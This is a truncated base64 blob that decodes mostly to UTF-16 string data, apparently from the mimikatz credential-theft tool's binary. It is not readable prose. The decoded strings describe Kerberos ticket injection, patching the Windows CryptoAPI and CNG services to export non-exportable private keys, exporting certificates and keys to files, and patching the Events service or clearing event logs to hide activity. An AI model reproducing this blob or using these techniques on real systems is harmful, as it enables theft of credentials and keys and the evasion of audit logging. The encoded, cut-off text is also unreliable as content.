AHMAdwBvAHIAZAAgADoAIAAlADAAOAB4AAoAAAAAAAAAWAAtAEMAQQBDAEgARQBDAE8ATgBGADoAAAAAAAAAAAAKAFAAcgBpAG4AYwBpAHAAYQBsACAAOgAgAAAAAAAAAAoACgBEAGEAdABhACAAJQB1AAAAAAAAAAoACQAgACAAIAAqACAASQBuAGoAZQBjAHQAaQBuAGcAIAB0AGkAYwBrAGUAdAAgADoAIAAAAAAACgAJACAAIAAgACoAIABTAGEAdgBlAGQAIAB0AG8AIABmAGkAbABlACAAJQBzACAAIQAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYwBhAGMAaABlAF8AZQBuAHUAbQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgAJACoAIAAlAHcAWgAgAGUAbgB0AHIAeQA/ACAAKgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAGMAYwBhAGMAaABlACAAdgBlAHIAcwBpAG8AbgAgACEAPQAgADAAeAAwADUAMAA0AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AcgBlAGEAZABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAQQB0ACAAbABlAGEAcwB0ACAAbwBuAGUAIABmAGkAbABlAG4AYQBtAGUAIABpAHMAIABuAGUAZQBkAGUAZAAKAAAAAAAAAAAAJQB1AC0AJQAwADgAeAAuACUAcwAAAAAAcgBlAHMAZQByAHYAZQBkAAAAAAAAAAAAZgBvAHIAdwBhAHIAZABhAGIAbABlAAAAZgBv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AFMAQQBfAEEARQBTAF8AUABSAE8AVgBfAFgAUAAAAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAEIAYQBzAGUAIABTAG0AYQByAHQAIABDAGEAcgBkACAAQwByAHkAcAB0AG8AIABQAHIAbwB2AGkAZABlAHIAAAAAAAAATQBTAF8AUwBDAEEAUgBEAF8AUABSAE8AVgAAAAAAAAAAAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAARABIACAAUwBDAGgAYQBuAG4AZQBsACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAAAAAAAAAE0AUwBfAEQARQBGAF8ARABIAF8AUwBDAEgAQQBOAE4ARQBMAF8AUABSAE8AVgAAAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBuAGgAYQBuAGMAZQBkACAARABTAFMAIABhAG4AZAAgAEQAaQBmAGYAaQBlAC0ASABlAGwAbABtAGEAbgAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAAAAAABNAFMAXwBFAE4ASABfAEQAUwBTAF8ARABIAF8AUABSAE8AVgAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAARABTAFMAIABhAG4AZAAgAEQAaQBmAGYAaQBlAC0ASABlAGwAbABtAGEAbgAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAAAAAABNAFMAXwBEAEUARgBfAEQAUwBTAF8ARABIAF8AUABSAE8AVgAAAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAEIAYQBzAGUAIABEAFMAUwAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAAAATQBTAF8ARABFAEYAXwBEAFMAUwBfAFAAUgBPAFYAAAAAAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUgBTAEEAIABTAEMAaABhAG4AbgBlAGwAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByAAAAAAAAAE0AUwBfAEQARQBGAF8AUgBTAEEAXwBTAEMASABBAE4ATgBFAEwAXwBQAFIATwBWAAAAAAAAAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAFIAUwBBACAAUwBpAGcAbgBhAHQAdQByAGUAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByAAAAAABNAFMAXwBEAEUARgBfAFIAUwBBAF8AUwBJAEcAXwBQAFIATwBWAAAAAAAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAFMAdAByAG8AbgBnACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAE0AUwBfAFMAVABSAE8ATgBHAF8AUABSAE8AVgAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABhAG4AYwBlAGQAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByACAAdgAxAC4AMAAAAAAATQBTAF8ARQBOAEgAQQBOAEMARQBEAF8AUABSAE8AVgAAAAAAAAAAAAAAAAAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAgAHYAMQAuADAAAAAAAE0AUwBfAEQARQBGAF8AUABSAE8AVgAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAFMARQBSAFYASQBDAEUAUwAAAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AVQBTAEUAUgBTAAAAAAAAAAAAAABDAEUAUgBUAF8AUwBZAFMAVABFAE0AXwBTAFQATwBSAEUAXwBDAFUAUgBSAEUATgBUAF8AUwBFAFIAVgBJAEMARQAAAAAAAAAAAAAAAAAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXwBFAE4AVABFAFIAUABSAEkAUwBFAAAAAAAAAAAAAAAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXwBHAFIATwBVAFAAXwBQAE8ATABJAEMAWQAAAAAAAAAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAAABDAEUAUgBUAF8AUwBZAFMAVABFAE0AXwBTAFQATwBSAEUAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBfAEcAUgBPAFUAUABfAFAATwBMAEkAQwBZAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAAAAAAAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAUABhAHQAYwBoACAAQwBOAEcAIABzAGUAcgB2AGkAYwBlACAAZgBvAHIAIABlAGEAcwB5ACAAZQB4AHAAbwByAHQAAAAAAAAAAABjAG4AZwAAAFsAZQB4AHAAZQByAGkAbQBlAG4AdABhAGwAXQAgAFAAYQB0AGMAaAAgAEMAcgB5AHAAdABvAEEAUABJACAAbABhAHkAZQByACAAZgBvAHIAIABlAGEAcwB5ACAAZQB4AHAAbwByAHQAAAAAAAAAAABjAGEAcABpAAAAAAAAAAAATABpAHMAdAAgACgAbwByACAAZQB4AHAAbwByAHQAKQAgAGsAZQB5AHMAIABjAG8AbgB0AGEAaQBuAGUAcgBzAAAAAAAAAAAAawBlAHkAcwAAAAAAAAAAAEwAaQBzAHQAIAAoAG8AcgAgAGUAeABwAG8AcgB0ACkAIABjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAAAAAAAABjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAAAAAAAAAAAEwAaQBzAHQAIABjAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAcwB0AG8AcgBlAHMAAAAAAAAAcwB0AG8AcgBlAHMAAAAAAEwAaQBzAHQAIABjAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAcAByAG8AdgBpAGQAZQByAHMAAAAAAAAAAABwAHIAbwB2AGkAZABlAHIAcwAAAAAAAABDAHIAeQBwAHQAbwAgAE0AbwBkAHUAbABlAAAAAAAAAGMAcgB5AHAAdABvAAAAAAByAHMAYQBlAG4AaAAAAAAAQ1BFeHBvcnRLZXkAAAAAAG4AYwByAHkAcAB0AAAAAABOQ3J5cHRPcGVuU3RvcmFnZVByb3ZpZGVyAAAAAAAAAE5DcnlwdEVudW1LZXlzAABOQ3J5cHRPcGVuS2V5AAAATkNyeXB0RXhwb3J0S2V5AE5DcnlwdEdldFByb3BlcnR5AAAAAAAAAE5DcnlwdEZyZWVCdWZmZXIAAAAAAAAAAE5DcnlwdEZyZWVPYmplY3QAAAAAAAAAAEJDcnlwdEVudW1SZWdpc3RlcmVkUHJvdmlkZXJzAAAAQkNyeXB0RnJlZUJ1ZmZlcgAAAAAAAAAACgBDAHIAeQBwAHQAbwBBAFAASQAgAHAAcgBvAHYAaQBkAGUAcgBzACAAOgAKAAAAJQAyAHUALgAgACUAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBwAHIAbwB2AGkAZABlAHIAcwAgADsAIABDAHIAeQBwAHQARQBuAHUAbQBQAHIAbwB2AGkAZABlAHIAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAEMATgBHACAAcAByAG8AdgBpAGQAZQByAHMAIAA6AAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHAAcgBvAHYAaQBkAGUAcgBzACAAOwAgAEIAQwByAHkAcAB0AEUAbgB1AG0AUgBlAGcAaQBzAHQAZQByAGUAZABQAHIAbwB2AGkAZABlAHIAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAHMAeQBzAHQAZQBtAHMAdABvAHIAZQAAAEEAcwBrAGkAbgBnACAAZgBvAHIAIABTAHkAcwB0AGUAbQAgAFMAdABvAHIAZQAgACcAJQBzACcAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAHQAbwByAGUAcwAgADsAIABDAGUAcgB0AEUAbgB1AG0AUwB5AHMAdABlAG0AUwB0AG8AcgBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAE0AeQAAAAAAAAAAAHMAdABvAHIAZQAAAAAAAAAAAAAAAAAAACAAKgAgAFMAeQBzAHQAZQBtACAAUwB0AG8AcgBlACAAIAA6ACAAJwAlAHMAJwAgACgAMAB4ACUAMAA4AHgAKQAKACAAKgAgAFMAdABvAHIAZQAgACAAIAAgACAAIAAgACAAIAA6ACAAJwAlAHMAJwAKAAoAAAAAACgAbgB1AGwAbAApAAAAAAAAAAAAAAAAAAkASwBlAHkAIABDAG8AbgB0AGEAaQBuAGUAcgAgACAAOgAgACUAcwAKAAkAUAByAG8AdgBpAGQAZQByACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAAAAJAFQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAcgB5AHAAdABHAGUAdABVAHMAZQByAEsAZQB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAawBlAHkAUwBwAGUAYwAgAD0APQAgAEMARQBSAFQAXwBOAEMAUgBZAFAAVABfAEsARQBZAF8AUwBQAEUAQwAgAHcAaQB0AGgAbwB1AHQAIABDAE4ARwAgAEgAYQBuAGQAbABlACAAPwAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAIAA7ACAAQwByAHkAcAB0AEEAYwBxAHUAaQByAGUAQwBlAHIAdABpAGYAaQBjAGEAdABlAFAAcgBpAHYAYQB0AGUASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AEcAZQB0AEMAZQByAHQAaQBmAGkAYwBhAHQAZQBDAG8AbgB0AGUAeAB0AFAAcgBvAHAAZQByAHQAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAZQByAHQARwBlAHQATgBhAG0AZQBTAHQAcgBpAG4AZwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzACAAOwAgAEMAZQByAHQARwBlAHQATgBhAG0AZQBTAHQAcgBpAG4AZwAgACgAZgBvAHIAIABsAGUAbgApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAgADsAIABDAGUAcgB0AE8AcABlAG4AUwB0AG8AcgBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABwAHIAbwB2AGkAZABlAHIAAAAAAAAAAABwAHIAbwB2AGkAZABlAHIAdAB5AHAAZQAAAAAAAAAAAG0AYQBjAGgAaQBuAGUAAAAAAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBvAGYAdAB3AGEAcgBlACAASwBlAHkAIABTAHQAbwByAGEAZwBlACAAUAByAG8AdgBpAGQAZQByAAAAYwBuAGcAcAByAG8AdgBpAGQAZQByAAAAAAAAAAAAAAAgACoAIABTAHQAbwByAGUAIAAgACAAIAAgACAAIAAgACAAOgAgACcAJQBzACcACgAgACoAIABQAHIAbwB2AGkAZABlAHIAIAAgACAAIAAgACAAOgAgACcAJQBzACcAIAAoACcAJQBzACcAKQAKACAAKgAgAFAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAIAA6ACAAJwAlAHMAJwAgACgAJQB1ACkACgAgACoAIABDAE4ARwAgAFAAcgBvAHYAaQBkAGUAcgAgACAAOgAgACcAJQBzACcACgAAAAAAAAAAAAoAQwByAHkAcAB0AG8AQQBQAEkAIABrAGUAeQBzACAAOgAKAAAAAAAKACUAMgB1AC4AIAAlAHMACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAIAA7ACAAQwByAHkAcAB0AEcAZQB0AFUAcwBlAHIASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzACAAOwAgAEMAcgB5AHAAdABHAGUAdABQAHIAbwB2AFAAYQByAGEAbQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAACgBDAE4ARwAgAGsAZQB5AHMAIAA6AAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AawBlAHkAcwAgADsAIABOAEMAcgB5AHAAdABPAHAAZQBuAEsAZQB5ACAAJQAwADgAeAAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAGsAZQB5AHMAIAA7ACAATgBDAHIAeQBwAHQARQBuAHUAbQBLAGUAeQBzACAAJQAwADgAeAAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBrAGUAeQBzACAAOwAgAE4AQwByAHkAcAB0AE8AcABlAG4AUwB0AG8AcgBhAGcAZQBQAHIAbwB2AGkAZABlAHIAIAAlADAAOAB4AAoAAAAAAAAAAABFAHgAcABvAHIAdAAgAFAAbwBsAGkAYwB5AAAAAAAAAEwAZQBuAGcAdABoAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcAByAGkAbgB0AEsAZQB5AEkAbgBmAG8AcwAgADsAIABOAEMAcgB5AHAAdABHAGUAdABQAHIAbwBwAGUAcgB0AHkAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBwAHIAaQBuAHQASwBlAHkASQBuAGYAbwBzACAAOwAgAEMAcgB5AHAAdABHAGUAdABLAGUAeQBQAGEAcgBhAG0AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAWQBFAFMAAABOAE8AAAAAAAkARQB4AHAAbwByAHQAYQBiAGwAZQAgAGsAZQB5ACAAOgAgACUAcwAKAAkASwBlAHkAIABzAGkAegBlACAAIAAgACAAIAAgACAAOgAgACUAdQAKAAAAAABwAHYAawAAAEMAQQBQAEkAUABSAEkAVgBBAFQARQBCAEwATwBCAAAATwBLAAAAAABLAE8AAAAAAAkAUAByAGkAdgBhAHQAZQAgAGUAeABwAG8AcgB0ACAAOgAgACUAcwAgAC0AIAAAACcAJQBzACcACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQASwBlAHkAVABvAEYAaQBsAGUAIAA7ACAARQB4AHAAbwByAHQAIAAvACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQASwBlAHkAVABvAEYAaQBsAGUAIAA7ACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGcAZQBuAGUAcgBhAHQAZQBGAGkAbABlAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAZABlAHIAAAAJAFAAdQBiAGwAaQBjACAAZQB4AHAAbwByAHQAIAAgADoAIAAlAHMAIAAtACAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABDAGUAcgB0ACAAOwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAQwBlAHIAdAAgADsAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGEAdABlAEYAaQBsAGUATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAHAAZgB4AAAAbQBpAG0AaQBrAGEAdAB6AAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAQwBlAHIAdAAgADsAIABFAHgAcABvAHIAdAAgAC8AIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACUAcwBfACUAcwBfACUAdQBfACUAcwAuACUAcwAAAAAAQQBUAF8ASwBFAFkARQBYAEMASABBAE4ARwBFAAAAAABBAFQAXwBTAEkARwBOAEEAVABVAFIARQAAAAAAAAAAAEMATgBHACAASwBlAHkAAAByAHMAYQBlAG4AaAAuAGQAbABsAAAAAABMAG8AYwBhAGwAIABDAHIAeQBwAHQAbwBBAFAASQAgAHAAYQB0AGMAaABlAGQACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBwAF8AYwBhAHAAaQAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcABfAGMAYQBwAGkAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAbgBjAHIAeQBwAHQALgBkAGwAbAAAAAAAbgBjAHIAeQBwAHQAcAByAG8AdgAuAGQAbABsAAAAAABLAGUAeQBJAHMAbwAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAHAAXwBjAG4AZwAgADsAIABOAG8AIABDAE4ARwAKAAAAQwBsAGUAYQByACAAYQBuACAAZQB2AGUAbgB0ACAAbABvAGcAAAAAAGMAbABlAGEAcgAAAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABwAGEAdABjAGgAIABFAHYAZQBuAHQAcwAgAHMAZQByAHYAaQBjAGUAIAB0AG8AIABhAHYAbwBpAGQAIABuAGUAdwAgAGUAdgBlAG4AdABzAAAAZAByAG8AcAAAAAAAAAAAAEUAdgBlAG4AdAAgAG0AbwBkAHUAbABlAAAAAAAAAAAAZQB2AGUAbgB0AAAAAAAAAGwAbwBnAAAAZQB2AGUAbgB0AGwAbwB